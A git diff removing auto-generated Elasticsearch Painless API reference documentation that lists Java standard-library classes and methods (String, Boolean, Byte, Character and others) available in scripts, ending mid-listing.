{java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-shared/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-shared/index.asciidoc deleted file mode 100644 index c8bbedadf6b..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-shared/index.asciidoc +++ /dev/null @@ -1,435 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-shared]] -=== Shared API - -The following API is available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. 
- - -==== java.lang -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== java.math -<> - -* <> -* <> -* <> -* <> - -==== java.text -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== java.time -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== java.time.chrono -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== java.time.format -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== java.time.temporal -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== java.time.zone -<> - -* <> -* <> -* <> -* <> -* <> -* <> - -==== java.util -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== java.util.function -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== java.util.regex -<> - -* <> -* <> - -==== java.util.stream -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== org.apache.lucene.util -<> - -* <> - -==== org.elasticsearch.common.geo -<> - -* <> - -==== org.elasticsearch.index.fielddata -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== org.elasticsearch.index.mapper -<> - -* <> - -==== org.elasticsearch.index.query -<> - -* <> - -==== org.elasticsearch.index.similarity -<> - -* <> -* <> -* <> -* <> - -==== org.elasticsearch.painless.api -<> - -* <> - -==== org.elasticsearch.script -<> - -* <> - -==== org.elasticsearch.search.lookup -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-shared/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-shared/packages.asciidoc deleted file mode 100644 index 584d7ade9ec..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-shared/packages.asciidoc +++ /dev/null @@ -1,8616 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-shared-java-lang"] -=== Shared API for package java.lang -See the <> for a high-level overview of all packages and classes. 
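Before the per-class listings, a small sketch showing how a few of these shared `java.lang` members are typically used from a script; the local values are assumptions:

[source,painless]
----
// A minimal sketch using shared java.lang members available in every context.
boolean flag = Boolean.parseBoolean("true");     // static helper from the Boolean listing
int radix = Character.MAX_RADIX;                 // static constant from the Character listing

int denominator = 0;                             // assumption, used to force an exception
String reason = "";
try {
    int x = 10 / denominator;
} catch (ArithmeticException e) {
    reason = e.getMessage();                     // getMessage() is exposed on the exception classes
}
return flag && reason != null;
----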
- -[[painless-api-reference-shared-Appendable]] -==== Appendable -* Appendable {java11-javadoc}/java.base/java/lang/Appendable.html#append(java.lang.CharSequence,int,int)[append](CharSequence, int, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ArithmeticException]] -==== ArithmeticException -* {java11-javadoc}/java.base/java/lang/ArithmeticException.html#()[ArithmeticException]() -* {java11-javadoc}/java.base/java/lang/ArithmeticException.html#(java.lang.String)[ArithmeticException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ArrayIndexOutOfBoundsException]] -==== ArrayIndexOutOfBoundsException -* {java11-javadoc}/java.base/java/lang/ArrayIndexOutOfBoundsException.html#()[ArrayIndexOutOfBoundsException]() -* {java11-javadoc}/java.base/java/lang/ArrayIndexOutOfBoundsException.html#(java.lang.String)[ArrayIndexOutOfBoundsException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ArrayStoreException]] -==== ArrayStoreException -* {java11-javadoc}/java.base/java/lang/ArrayStoreException.html#()[ArrayStoreException]() -* {java11-javadoc}/java.base/java/lang/ArrayStoreException.html#(java.lang.String)[ArrayStoreException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Boolean]] -==== Boolean -* static Boolean {java11-javadoc}/java.base/java/lang/Boolean.html#FALSE[FALSE] -* static Boolean {java11-javadoc}/java.base/java/lang/Boolean.html#TRUE[TRUE] -* static int {java11-javadoc}/java.base/java/lang/Boolean.html#compare(boolean,boolean)[compare](boolean, boolean) -* static int {java11-javadoc}/java.base/java/lang/Boolean.html#hashCode(boolean)[hashCode](boolean) -* static boolean 
{java11-javadoc}/java.base/java/lang/Boolean.html#logicalAnd(boolean,boolean)[logicalAnd](boolean, boolean) -* static boolean {java11-javadoc}/java.base/java/lang/Boolean.html#logicalOr(boolean,boolean)[logicalOr](boolean, boolean) -* static boolean {java11-javadoc}/java.base/java/lang/Boolean.html#logicalXor(boolean,boolean)[logicalXor](boolean, boolean) -* static boolean {java11-javadoc}/java.base/java/lang/Boolean.html#parseBoolean(java.lang.String)[parseBoolean](null) -* static null {java11-javadoc}/java.base/java/lang/Boolean.html#toString(boolean)[toString](boolean) -* static Boolean {java11-javadoc}/java.base/java/lang/Boolean.html#valueOf(boolean)[valueOf](boolean) -* boolean {java11-javadoc}/java.base/java/lang/Boolean.html#booleanValue()[booleanValue]() -* int {java11-javadoc}/java.base/java/lang/Boolean.html#compareTo(java.lang.Boolean)[compareTo](Boolean) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Byte]] -==== Byte -* static int {java11-javadoc}/java.base/java/lang/Byte.html#BYTES[BYTES] -* static byte {java11-javadoc}/java.base/java/lang/Byte.html#MAX_VALUE[MAX_VALUE] -* static byte {java11-javadoc}/java.base/java/lang/Byte.html#MIN_VALUE[MIN_VALUE] -* static int {java11-javadoc}/java.base/java/lang/Byte.html#SIZE[SIZE] -* static int {java11-javadoc}/java.base/java/lang/Byte.html#compare(byte,byte)[compare](byte, byte) -* static Byte {java11-javadoc}/java.base/java/lang/Byte.html#decode(java.lang.String)[decode](null) -* static int {java11-javadoc}/java.base/java/lang/Byte.html#hashCode(byte)[hashCode](byte) -* static byte {java11-javadoc}/java.base/java/lang/Byte.html#parseByte(java.lang.String)[parseByte](null) -* static byte {java11-javadoc}/java.base/java/lang/Byte.html#parseByte(java.lang.String,int)[parseByte](null, int) -* static null {java11-javadoc}/java.base/java/lang/Byte.html#toString(byte)[toString](byte) -* static int {java11-javadoc}/java.base/java/lang/Byte.html#toUnsignedInt(byte)[toUnsignedInt](byte) -* static long {java11-javadoc}/java.base/java/lang/Byte.html#toUnsignedLong(byte)[toUnsignedLong](byte) -* static Byte {java11-javadoc}/java.base/java/lang/Byte.html#valueOf(byte)[valueOf](byte) -* static Byte {java11-javadoc}/java.base/java/lang/Byte.html#valueOf(java.lang.String,int)[valueOf](null, int) -* byte {java11-javadoc}/java.base/java/lang/Number.html#byteValue()[byteValue]() -* int {java11-javadoc}/java.base/java/lang/Byte.html#compareTo(java.lang.Byte)[compareTo](Byte) -* double {java11-javadoc}/java.base/java/lang/Number.html#doubleValue()[doubleValue]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* float {java11-javadoc}/java.base/java/lang/Number.html#floatValue()[floatValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/Number.html#intValue()[intValue]() -* long {java11-javadoc}/java.base/java/lang/Number.html#longValue()[longValue]() -* short {java11-javadoc}/java.base/java/lang/Number.html#shortValue()[shortValue]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-CharSequence]] -==== CharSequence -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* 
IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* null replaceAll(Pattern, Function) -* null replaceFirst(Pattern, Function) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* null {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() - - -[[painless-api-reference-shared-Character]] -==== Character -* static int {java11-javadoc}/java.base/java/lang/Character.html#BYTES[BYTES] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#COMBINING_SPACING_MARK[COMBINING_SPACING_MARK] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#CONNECTOR_PUNCTUATION[CONNECTOR_PUNCTUATION] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#CONTROL[CONTROL] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#CURRENCY_SYMBOL[CURRENCY_SYMBOL] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DASH_PUNCTUATION[DASH_PUNCTUATION] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DECIMAL_DIGIT_NUMBER[DECIMAL_DIGIT_NUMBER] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_ARABIC_NUMBER[DIRECTIONALITY_ARABIC_NUMBER] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_BOUNDARY_NEUTRAL[DIRECTIONALITY_BOUNDARY_NEUTRAL] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_COMMON_NUMBER_SEPARATOR[DIRECTIONALITY_COMMON_NUMBER_SEPARATOR] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_EUROPEAN_NUMBER[DIRECTIONALITY_EUROPEAN_NUMBER] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_EUROPEAN_NUMBER_SEPARATOR[DIRECTIONALITY_EUROPEAN_NUMBER_SEPARATOR] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_EUROPEAN_NUMBER_TERMINATOR[DIRECTIONALITY_EUROPEAN_NUMBER_TERMINATOR] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_LEFT_TO_RIGHT[DIRECTIONALITY_LEFT_TO_RIGHT] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_LEFT_TO_RIGHT_EMBEDDING[DIRECTIONALITY_LEFT_TO_RIGHT_EMBEDDING] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_LEFT_TO_RIGHT_OVERRIDE[DIRECTIONALITY_LEFT_TO_RIGHT_OVERRIDE] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_NONSPACING_MARK[DIRECTIONALITY_NONSPACING_MARK] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_OTHER_NEUTRALS[DIRECTIONALITY_OTHER_NEUTRALS] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_PARAGRAPH_SEPARATOR[DIRECTIONALITY_PARAGRAPH_SEPARATOR] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_POP_DIRECTIONAL_FORMAT[DIRECTIONALITY_POP_DIRECTIONAL_FORMAT] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_RIGHT_TO_LEFT[DIRECTIONALITY_RIGHT_TO_LEFT] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_RIGHT_TO_LEFT_ARABIC[DIRECTIONALITY_RIGHT_TO_LEFT_ARABIC] -* static 
byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_RIGHT_TO_LEFT_EMBEDDING[DIRECTIONALITY_RIGHT_TO_LEFT_EMBEDDING] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_RIGHT_TO_LEFT_OVERRIDE[DIRECTIONALITY_RIGHT_TO_LEFT_OVERRIDE] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_SEGMENT_SEPARATOR[DIRECTIONALITY_SEGMENT_SEPARATOR] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_UNDEFINED[DIRECTIONALITY_UNDEFINED] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_WHITESPACE[DIRECTIONALITY_WHITESPACE] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#ENCLOSING_MARK[ENCLOSING_MARK] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#END_PUNCTUATION[END_PUNCTUATION] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#FINAL_QUOTE_PUNCTUATION[FINAL_QUOTE_PUNCTUATION] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#FORMAT[FORMAT] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#INITIAL_QUOTE_PUNCTUATION[INITIAL_QUOTE_PUNCTUATION] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#LETTER_NUMBER[LETTER_NUMBER] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#LINE_SEPARATOR[LINE_SEPARATOR] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#LOWERCASE_LETTER[LOWERCASE_LETTER] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#MATH_SYMBOL[MATH_SYMBOL] -* static int {java11-javadoc}/java.base/java/lang/Character.html#MAX_CODE_POINT[MAX_CODE_POINT] -* static char {java11-javadoc}/java.base/java/lang/Character.html#MAX_HIGH_SURROGATE[MAX_HIGH_SURROGATE] -* static char {java11-javadoc}/java.base/java/lang/Character.html#MAX_LOW_SURROGATE[MAX_LOW_SURROGATE] -* static int {java11-javadoc}/java.base/java/lang/Character.html#MAX_RADIX[MAX_RADIX] -* static char {java11-javadoc}/java.base/java/lang/Character.html#MAX_SURROGATE[MAX_SURROGATE] -* static char {java11-javadoc}/java.base/java/lang/Character.html#MAX_VALUE[MAX_VALUE] -* static int {java11-javadoc}/java.base/java/lang/Character.html#MIN_CODE_POINT[MIN_CODE_POINT] -* static char {java11-javadoc}/java.base/java/lang/Character.html#MIN_HIGH_SURROGATE[MIN_HIGH_SURROGATE] -* static char {java11-javadoc}/java.base/java/lang/Character.html#MIN_LOW_SURROGATE[MIN_LOW_SURROGATE] -* static int {java11-javadoc}/java.base/java/lang/Character.html#MIN_RADIX[MIN_RADIX] -* static int {java11-javadoc}/java.base/java/lang/Character.html#MIN_SUPPLEMENTARY_CODE_POINT[MIN_SUPPLEMENTARY_CODE_POINT] -* static char {java11-javadoc}/java.base/java/lang/Character.html#MIN_SURROGATE[MIN_SURROGATE] -* static char {java11-javadoc}/java.base/java/lang/Character.html#MIN_VALUE[MIN_VALUE] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#MODIFIER_LETTER[MODIFIER_LETTER] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#MODIFIER_SYMBOL[MODIFIER_SYMBOL] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#NON_SPACING_MARK[NON_SPACING_MARK] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#OTHER_LETTER[OTHER_LETTER] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#OTHER_NUMBER[OTHER_NUMBER] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#OTHER_PUNCTUATION[OTHER_PUNCTUATION] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#OTHER_SYMBOL[OTHER_SYMBOL] -* static byte 
{java11-javadoc}/java.base/java/lang/Character.html#PARAGRAPH_SEPARATOR[PARAGRAPH_SEPARATOR] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#PRIVATE_USE[PRIVATE_USE] -* static int {java11-javadoc}/java.base/java/lang/Character.html#SIZE[SIZE] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#SPACE_SEPARATOR[SPACE_SEPARATOR] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#START_PUNCTUATION[START_PUNCTUATION] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#SURROGATE[SURROGATE] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#TITLECASE_LETTER[TITLECASE_LETTER] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#UNASSIGNED[UNASSIGNED] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#UPPERCASE_LETTER[UPPERCASE_LETTER] -* static int {java11-javadoc}/java.base/java/lang/Character.html#charCount(int)[charCount](int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#codePointAt(java.lang.CharSequence,int)[codePointAt](CharSequence, int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#codePointAt(char%5B%5D,int,int)[codePointAt](char[], int, int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#codePointBefore(java.lang.CharSequence,int)[codePointBefore](CharSequence, int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#codePointBefore(char%5B%5D,int,int)[codePointBefore](char[], int, int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#codePointCount(java.lang.CharSequence,int,int)[codePointCount](CharSequence, int, int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#compare(char,char)[compare](char, char) -* static int {java11-javadoc}/java.base/java/lang/Character.html#digit(int,int)[digit](int, int) -* static char {java11-javadoc}/java.base/java/lang/Character.html#forDigit(int,int)[forDigit](int, int) -* static byte {java11-javadoc}/java.base/java/lang/Character.html#getDirectionality(int)[getDirectionality](int) -* static null {java11-javadoc}/java.base/java/lang/Character.html#getName(int)[getName](int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#getNumericValue(int)[getNumericValue](int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#getType(int)[getType](int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#hashCode(char)[hashCode](char) -* static char {java11-javadoc}/java.base/java/lang/Character.html#highSurrogate(int)[highSurrogate](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isAlphabetic(int)[isAlphabetic](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isBmpCodePoint(int)[isBmpCodePoint](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isDefined(int)[isDefined](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isDigit(int)[isDigit](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isHighSurrogate(char)[isHighSurrogate](char) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isISOControl(int)[isISOControl](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isIdentifierIgnorable(int)[isIdentifierIgnorable](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isIdeographic(int)[isIdeographic](int) -* static boolean 
{java11-javadoc}/java.base/java/lang/Character.html#isJavaIdentifierPart(int)[isJavaIdentifierPart](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isJavaIdentifierStart(int)[isJavaIdentifierStart](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isLetter(int)[isLetter](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isLetterOrDigit(int)[isLetterOrDigit](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isLowerCase(int)[isLowerCase](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isMirrored(int)[isMirrored](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isSpaceChar(int)[isSpaceChar](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isSupplementaryCodePoint(int)[isSupplementaryCodePoint](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isSurrogate(char)[isSurrogate](char) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isSurrogatePair(char,char)[isSurrogatePair](char, char) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isTitleCase(int)[isTitleCase](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isUnicodeIdentifierPart(int)[isUnicodeIdentifierPart](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isUnicodeIdentifierStart(int)[isUnicodeIdentifierStart](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isUpperCase(int)[isUpperCase](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isValidCodePoint(int)[isValidCodePoint](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isWhitespace(int)[isWhitespace](int) -* static char {java11-javadoc}/java.base/java/lang/Character.html#lowSurrogate(int)[lowSurrogate](int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#offsetByCodePoints(java.lang.CharSequence,int,int)[offsetByCodePoints](CharSequence, int, int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#offsetByCodePoints(char%5B%5D,int,int,int,int)[offsetByCodePoints](char[], int, int, int, int) -* static char {java11-javadoc}/java.base/java/lang/Character.html#reverseBytes(char)[reverseBytes](char) -* static char[] {java11-javadoc}/java.base/java/lang/Character.html#toChars(int)[toChars](int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#toChars(int,char%5B%5D,int)[toChars](int, char[], int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#toCodePoint(char,char)[toCodePoint](char, char) -* static char {java11-javadoc}/java.base/java/lang/Character.html#toLowerCase(char)[toLowerCase](char) -* static null {java11-javadoc}/java.base/java/lang/Character.html#toString(char)[toString](char) -* static char {java11-javadoc}/java.base/java/lang/Character.html#toTitleCase(char)[toTitleCase](char) -* static char {java11-javadoc}/java.base/java/lang/Character.html#toUpperCase(char)[toUpperCase](char) -* static Character {java11-javadoc}/java.base/java/lang/Character.html#valueOf(char)[valueOf](char) -* char {java11-javadoc}/java.base/java/lang/Character.html#charValue()[charValue]() -* int {java11-javadoc}/java.base/java/lang/Character.html#compareTo(java.lang.Character)[compareTo](Character) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int 
{java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]()
-* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]()
-
-
-[[painless-api-reference-shared-Character-Subset]]
-==== Character.Subset
-* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object)
-* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]()
-* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]()
-
-
-[[painless-api-reference-shared-Character-UnicodeBlock]]
-==== Character.UnicodeBlock
